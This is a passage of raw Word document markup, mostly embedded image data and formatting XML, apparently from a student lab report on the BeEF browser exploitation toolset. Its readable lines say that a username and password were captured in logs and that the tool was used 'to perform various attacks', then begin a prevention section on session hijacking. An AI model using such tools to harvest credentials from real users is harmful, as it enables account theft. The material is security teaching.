10;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&#10;nWf6P33+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cXFqc2gMA&#10;AB4KAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQDgwUZC&#10;g6gBAIOoAQAUAAAAAAAAAAAAAAAAAEMGAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ1BLAQItABQABgAI&#10;AAAAIQByPM3j3AAAAAUBAAAPAAAAAAAAAAAAAAAAAPiuAQBkcnMvZG93bnJldi54bWxQSwECLQAU&#10;AAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAAABsAEAZHJzL19yZWxzL2Uyb0RvYy54&#10;bWwucmVsc1BLBQYAAAAABgAGAHwBAADysAEAAAA=&#10;">
                <v:rect id="Rectangle 6521" o:spid="_x0000_s1400" style="position:absolute;left:59192;top:32362;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08983742" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 6536" o:spid="_x0000_s1401" type="#_x0000_t75" style="position:absolute;left:127;top:127;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1kfxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heYXedGMkQaKrFFvBi4eqYHt7Zl+T2OzbJLvV+O+7hYLHYWa+YRar3tTiSp2rLCuYjCMQ&#10;xLnVFRcKjofNaAbCeWSNtWVScCcHq+VwsMBM2xu/03XvCxEg7DJUUHrfZFK6vCSDbmwb4uB92c6g&#10;D7IrpO7wFuCmlnEUpdJgxWGhxIbWJeXf+x+jYPb5dsHz7tTuJt6+xpc2iduPRKnnp/5lDsJT7x/h&#10;//ZWK0iTaQp/b8ITkMtfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEHzWR/HAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId145" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6537" o:spid="_x0000_s1402" style="position:absolute;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VpxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Li8JA&#10;EITvgv9haMGbTnxslOgo4mPZoy9Y9tZk2iSY6QmZ0cR/v7Ow4LGoqq+o5bo1pXhS7QrLCkbDCARx&#10;anXBmYLr5TCYg3AeWWNpmRS8yMF61e0sMdG24RM9zz4TAcIuQQW591UipUtzMuiGtiIO3s3WBn2Q&#10;dSZ1jU2Am1KOoyiWBgsOCzlWtM0pvZ8fRsG+GX/7n+PnfT66WV1Nsx1Pjhel+r12swDhqfXv8H/7&#10;SyuIPyYz+HsTnoBc/QIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQARQxVpxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F945E7A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and in logs you can see that username and password have been recorded </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F93640" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A31D79" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AE9E33" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conclusion :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hence Successfully demonstrated how to use Beef Toolset to perform various attacks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7CC17" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D65BA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc48952"/>
      <w:r>
        <w:t xml:space="preserve">PREVENTION </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>MEASURES :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="24143C1B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37529FBE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Session Hijacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C6FDE2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2806BA58" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
